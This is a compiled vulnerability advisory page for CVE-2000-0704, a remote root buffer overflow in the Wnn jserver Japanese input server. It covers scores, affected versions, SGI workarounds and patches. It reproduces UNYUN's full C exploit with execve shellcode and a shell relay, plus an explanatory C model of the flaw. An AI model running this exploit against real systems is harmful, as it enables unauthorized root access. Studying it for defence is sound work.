CVE-2000-0704
CVSS 10.0
Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:41

[Original] Buffer overflow in SGI Omron WorldView Wnn allows remote attackers to execute arbitrary commands via long JS_OPEN, JS_MKDIR, or JS_FILE_INFO commands.


[CNNVD] WorldView Wnn Jserver Remote Buffer Overflow Vulnerability (CNNVD-200010-054)

        
        Wnn is a Japanese Kana-Kanji conversion system, commonly used on Unix systems to provide Japanese language support. It is a client-server application: the Jserver component is the server side and performs the conversions for its clients.
        Some versions of Wnn contain a remote buffer overflow. A remote attacker can exploit it to execute arbitrary instructions on the host with the privileges of the Jserver process.
        Sending Jserver a Wnn command such as JS_OPEN, JS_MKDIR or JS_FILE_INFO followed by an over-long string overflows a fixed-size buffer in the server. With a carefully constructed string the attacker can run arbitrary instructions with the privileges Jserver holds, which is usually root.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [the system can be rendered completely unavailable]
Access complexity: LOW [no special access conditions are required to exploit]
Access vector: [--]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:wnn:wnn4:4.2.8
cpe:/a:freewnn:freewnn:1.0
cpe:/a:omron:worldview:6.5
cpe:/a:wnn:wnn4:4.2.2tl
cpe:/a:freewnn:freewnn:1.1
cpe:/a:wnn:wnn4:4.2.5tl
cpe:/a:freewnn:freewnn:1.1.1_axxx

- OVAL (technical details for detection)

No matching OVAL definitions were found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0704
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0704
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-054
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/1603
(VENDOR_ADVISORY)  BID  1603
ftp://sgigate.sgi.com/security/20000803-01-A
(UNKNOWN)  SGI  20000803-01-A
http://xforce.iss.net/xforce/xfdb/5163
(UNKNOWN)  XF  irix-worldview-wnn-bo(5163)
http://www.osvdb.org/11080
(UNKNOWN)  OSVDB  11080

- Vulnerability information

WorldView Wnn Jserver Remote Buffer Overflow Vulnerability
Critical   Boundary condition error
Published: 2000-10-20 00:00:00   Updated: 2005-10-20 00:00:00
Remote
        

- Advisories and patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the exposure:
        * If Jserver is not in use, disable it.
        * If you run Omron's Wnn6 on an SGI graphics workstation, SGI recommends disabling Jserver as follows:
        1) Become the superuser
         % /bin/su -
         Password:
         #
        2) Check whether WorldView is installed; only systems with WorldView installed are affected by this issue
         # versions -b
         I WorldView_base_jp 05/06/1998 WorldView Base Japanese 6.5
         I WorldView_books_jp 05/06/1998 WorldView Books: Japanese 6.5
         I WorldView_fonts_jp1 05/06/1998 WorldView Fonts Japanese, 6.5
         I WorldView_japanese 05/06/1998 WorldView Japanese 6.5
        3) If WorldView is not currently needed, disable Jserver
         # chkconfig jserver off
         Note: this also disables Japanese input
        4) Add the following lines to /etc/passwd and /etc/group (if uid/gid 127 is already taken on your system, pick another unused value and use it consistently in both files)
         /etc/passwd:
         wnn:*:127:127:Wnn System Account:/usr/lib/wnn6:/bin/sh
         /etc/group:
         wnn:*:127
        5) Change the owner of the Wnn-related files
         # chown -R wnn.sys /usr/bin/Wnn6
         # chown -R wnn.sys /usr/lib/wnn6
        6) Verify that the ownership really changed
         # ls -ls /usr/bin/Wnn6/jserver
         1136 -r-sr-xr-x 1 wnn sys 578660
         # ls -ls /usr/lib/wnn6/serverdefs
         8 -rw-r--r-- 1 wnn sys 662
         Note that jserver is a setuid binary (the s in -r-sr-xr-x). Steps 4 and 5 do not remove the overflow; they change the account the daemon runs as from root to wnn, so that a successful exploit yields the unprivileged wnn account instead of root. If the listing still shows root as the owner, the chown did not take effect and the daemon still runs as root.
        7) Reboot the system
         # reboot
        Vendor patches:
        FreeWnn
        -------
        The vendor has not yet released a patch or upgrade; users of this software are advised to watch the vendor's homepage for the latest version:
        
        http://www.freewnn.org/

- Vulnerability information (EDB 20163)

WorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow Vulnerability (EDBID:20163)
unix remote
2000-03-08 Verified
0 UNYUN
N/A
source: http://www.securityfocus.com/bid/1603/info

A remote buffer overflow exists in the Asian language servers portion of a number of different implementations of Wnn. It has been reported that only systems that have WorldView Japanese, Korean, and Chinese installed are vulnerable to this issue. Wnn is a Kana-Kanji translation system, most commonly used for foreign language support in Unix systems.

An overflow exists when the server receives a long string with a Wnn command, such as JS_OPEN, JS_MKDIR or JS_FILE_INFO included. By creating a buffer containing machine executable code, it is possible to cause a remote system running the jserver daemon to execute arbitrary commands as the user the daemon is running as. This is frequently root.
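The defect described above (an unbounded copy of the string that follows a JS_OPEN, JS_MKDIR or JS_FILE_INFO command into a fixed-size buffer), modelled in C as an added example. This is not code from the page, from Wnn/FreeWnn/WorldView, or from UNYUN; the vulnerable and hardened handlers, the 64-byte buffer, the simulated stack frame, the result codes and the "clean" return address are assumptions. Only the wire framing is taken from the exploit that follows: a 4-byte big-endian command (0x01), a 4-byte version (0x4000), then the string argument, with the return address sprayed little-endian for x86.

```c
/* Added example: model of the jserver overflow class beside a bounded handler.
 * Not code from Wnn/FreeWnn/WorldView or from the exploit author. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HDR_LEN     8               /* command + version, each 4 bytes, big-endian */
#define NAME_BUF    64              /* assumed size of the handler's local buffer */
#define FRAME_SIZE  (NAME_BUF + 4)  /* model frame: local buffer, then saved return address */
#define CLEAN_RET   0x08048000u     /* assumed "clean" return address in the model frame */

enum { JS_OK = 0, JS_BAD_FRAME = -1, JS_TOO_LONG = -2 };   /* assumed result codes */

static uint32_t get_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

static void put_be32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24); p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);  p[3] = (unsigned char)v;
}

/* Little-endian store/load: the byte order the exploit uses for RET on x86. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Client side: frame a request the way putint() in the exploit does.
 * Returns the number of bytes written, or 0 if out is too small. */
size_t build_request(uint32_t cmd, uint32_t ver, const unsigned char *arg,
                     size_t arglen, unsigned char *out, size_t outsz)
{
    if (outsz < HDR_LEN + arglen) return 0;
    put_be32(out, cmd);
    put_be32(out + 4, ver);
    memcpy(out + HDR_LEN, arg, arglen);
    return HDR_LEN + arglen;
}

/* Fill an argument with a repeated return address, as the exploit's RET
 * spray does: every 4-byte-aligned slot then reads as ret. */
void fill_ret_spray(unsigned char *arg, size_t n, uint32_t ret)
{
    size_t i;
    for (i = 0; i + 4 <= n; i += 4) put_le32(arg + i, ret);
    for (; i < n; i++) arg[i] = 0x90;   /* pad any tail with NOPs */
}

/* Vulnerable handler (model): copies the argument into a fixed-size local
 * buffer with no length check. The frame is one flat byte array so the write
 * past the buffer stays inside a single object and the demo is deterministic;
 * on a real stack those bytes are the saved frame pointer and return address.
 * Returns the value left in the saved-return-address slot after the copy. */
uint32_t handle_vulnerable(const unsigned char *msg, size_t len,
                           unsigned char frame[FRAME_SIZE])
{
    size_t arglen;
    if (len < HDR_LEN) return 0;
    arglen = len - HDR_LEN;
    memset(frame, 0, FRAME_SIZE);
    put_le32(frame + NAME_BUF, CLEAN_RET);
    /* The only bound here is the size of the model frame; a real strcpy()
     * into name[NAME_BUF] keeps writing as long as the attacker's string does. */
    if (arglen > FRAME_SIZE) arglen = FRAME_SIZE;
    memcpy(frame, msg + HDR_LEN, arglen);
    return get_le32(frame + NAME_BUF);
}

/* Hardened handler: checks the length against the buffer before copying and
 * rejects over-long arguments with JS_TOO_LONG instead of truncating them. */
int handle_hardened(const unsigned char *msg, size_t len, char name[NAME_BUF])
{
    size_t arglen;
    if (len < HDR_LEN) return JS_BAD_FRAME;
    (void)get_be32(msg);        /* command opcode; numeric values are not on this page */
    (void)get_be32(msg + 4);    /* protocol version */
    arglen = len - HDR_LEN;
    if (arglen >= NAME_BUF) return JS_TOO_LONG;   /* leave room for the NUL */
    memcpy(name, msg + HDR_LEN, arglen);
    name[arglen] = '\0';
    return JS_OK;
}

int main(void)
{
    unsigned char arg[800], msg[820], frame[FRAME_SIZE];
    char name[NAME_BUF];
    size_t n;

    fill_ret_spray(arg, sizeof arg, 0xbffffcb4u);   /* RET from the exploit below */
    n = build_request(0x01, 0x4000, arg, sizeof arg, msg, sizeof msg);
    printf("vulnerable: return slot = 0x%08x\n", handle_vulnerable(msg, n, frame));
    printf("hardened:   rc = %d\n", handle_hardened(msg, n, name));
    return 0;
}
```

With the sprayed 800-byte argument the model frame's return slot reads back as the exploit's RET, which is the whole mechanism: whichever slot above the buffer holds the return address ends up pointing into the NOP sled. The hardened handler refuses the same request up front rather than copying and truncating, so the length of an attacker-controlled string never reaches a copy routine unchecked.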

/*=============================================================================
   Wnn4.2 / jserver remote buffer overflow exploit for Linux
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/
#include <stdio.h>
#include <netdb.h>
#include <fcntl.h>
#include <ctype.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define TARGET_PORT 22273       /* TCP port jserver listens on */
#define COMMAND     0x01        /* Wnn request opcode, sent first */
#define VERSION     0x4000      /* protocol version, sent second */
#define MAXBUF      800         /* size of the overflowing string */
#define STR1_SIZE   10
#define NOP         0x90        /* x86 NOP, used for the sled */
#define RET         0xbffffcb4  /* guessed stack address inside the sled (Linux/x86) */
#define ADJUST      3           /* alignment offset for the return-address slots */

/* Linux/x86 execve("/bin/sh") shellcode */
char *shellcode =
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa\x89\xf9\x89\xf0\xab"
"\x89\xfa\x31\xc0\xab\xb0\x04\x04\x07\xcd\x80\x31\xc0\x89\xc3\x40\xcd\x80"
"\xe8\xd9\xff\xff\xff/bin/sh";

/* Send a 32-bit integer in network (big-endian) byte order, as the
   jserver protocol expects. */
void putint(int sockfd, int c)
{
    unsigned char tmp[4];

    tmp[0]=(c >> (8 * 3))&0xff;
    tmp[1]=(c >> (8 * 2))&0xff;
    tmp[2]=(c >> (8 * 1))&0xff;
    tmp[3]=c&0xff;
    write(sockfd,tmp,4);
}

/* Relay data between the socket (p) and the local terminal (c) once
   the shell is up. */
void term (int p, int c)
{
    char    buf[1032];
    fd_set  rfds;
    int     i;

    while(1){
        FD_ZERO (&rfds);
        FD_SET (p, &rfds);
        FD_SET (c, &rfds);
        if (select ((p > c ? p : c) + 1, &rfds, NULL, NULL, NULL) < 1) return;
        if (FD_ISSET (c, &rfds)){
            if ((i = read (c, buf, sizeof (buf))) < 1) exit (0);
            else write (p, buf, i);
        }
        if (FD_ISSET (p, &rfds)){
            if ((i = read (p, buf, sizeof (buf))) < 1) exit (0);
            else write (c, buf, i);
        }
    }
}

int main(int argc,char *argv[])
{
    int                 sockfd,i;
    struct sockaddr_in  target;
    struct hostent      *hs;
    char                buf[MAXBUF];

    if (argc<2){
        printf("usage : %s TargetHost\n",argv[0]);
        exit(1);
    }
    sockfd=socket(AF_INET, SOCK_STREAM, 0);
    memset(&target,0,sizeof(target));
    target.sin_family=AF_INET;
    target.sin_port=htons(TARGET_PORT);
    if ((target.sin_addr.s_addr=inet_addr(argv[1]))==INADDR_NONE){
        if ((hs=gethostbyname(argv[1]))==NULL){
            printf("Can not resolve specified host.\n");
            exit(1);
        }
        target.sin_family = hs->h_addrtype;
        memcpy(&target.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sockfd, (struct sockaddr*)&target, sizeof(target))!=0){
        printf("Can not connect to %s:%d\n",argv[1],TARGET_PORT);
        exit(1);
    }
    /* Request header: opcode, then protocol version. */
    putint(sockfd,COMMAND);
    putint(sockfd,VERSION);

    /* Payload layout: NOP sled everywhere, the return address repeated
       (little-endian, x86) at bytes 100..400 so that whichever slot holds
       the saved return address lands in the sled, and the shellcode at 600. */
    memset(buf,NOP,MAXBUF);
    printf("Jumping Address=%x\n",RET);
    for (i=100+ADJUST;i<400+ADJUST;i+=4){
        buf[i+3]=(RET>>24)&0xff;
        buf[i+2]=(RET>>16)&0xff;
        buf[i+1]=(RET>>8)&0xff;
        buf[i+0]=RET&0xff;
    }
    buf[STR1_SIZE]=0;      /* NUL terminators: one at STR1_SIZE, one at the end */
    buf[MAXBUF-1]=0;
    memcpy(buf+600+ADJUST,shellcode,strlen(shellcode));
    write(sockfd,buf,MAXBUF);
    printf("Connected to %d\n",TARGET_PORT);
    term(sockfd,0);
    return 0;
}

- Vulnerability information (OSVDB 11080)

11080
IRIX Omron WorldView Wnn Multiple Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public

- Vulnerability description

A remote overflow exists in WorldView on IRIX. The jserver fails to validate input resulting in a buffer overflow. With a specially crafted request, such as a long string with a Wnn command (JS_OPEN, JS_MKDIR or JS_FILE_INFO), an attacker can execute arbitrary shellcode as root, resulting in a loss of integrity.

- Timeline

2000-03-08 Unknown
2000-03-08 Unknown

- Solution

Upgrade to IRIX 6.5.16 or later, which has been reported to fix this vulnerability. In addition, SGI has released patches for some older versions.

- Vulnerability information (BID 1603)

Omron WorldView Wnn Asian Language Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 1603
Remote: Yes   Local: No
2000-03-08 12:00:00 2009-07-11 02:56:00
This vulnerability was discovered by UNYUN <shadowpenguin@backsection.net>

- Affected software versions

Wnn Wnn4 4.2 -8
+ Turbolinux Turbolinux 4.2
+ Turbolinux Turbolinux 4.0
Wnn Wnn4 4.2 -5TL
+ Turbolinux Turbolinux 3.0
Wnn Wnn4 4.2 -2TL
+ Turbolinux Turbolinux 2.0
Omron WorldView 6.5
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.11
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.10
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.9
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.8
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
+ SGI IRIX 6.5.7
+ SGI IRIX 6.5.6 m
+ SGI IRIX 6.5.6 f
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5 m
+ SGI IRIX 6.5.5 f
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4 m
+ SGI IRIX 6.5.4 f
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3 m
+ SGI IRIX 6.5.3 f
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2 m
+ SGI IRIX 6.5.2 f
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
FreeWnn FreeWnn 1.1.1 -aXXX
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
FreeWnn FreeWnn 1.1
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
FreeWnn FreeWnn 1.0
- Debian Linux 2.2
- Debian Linux 2.1
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SGI IRIX 6.5
- SGI IRIX 6.4
- SGI IRIX 6.3
- SGI IRIX 6.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6

- Exploit

An exploit was provided by UNYUN (shadowpenguin@backsection.net); it is reproduced in the EDB 20163 entry above.

- Solution

SGI has stated that IRIX 6.5 through IRIX 6.5.15 are vulnerable to this issue. SGI has also issued patches (4632, 4633, 4644, 4645, 4646, 4647) to address this vulnerability.

SGI has stated that IRIX 6.5.16 is not vulnerable to this issue. Users are advised to upgrade to a newer version of IRIX.


Omron WorldView 6.5
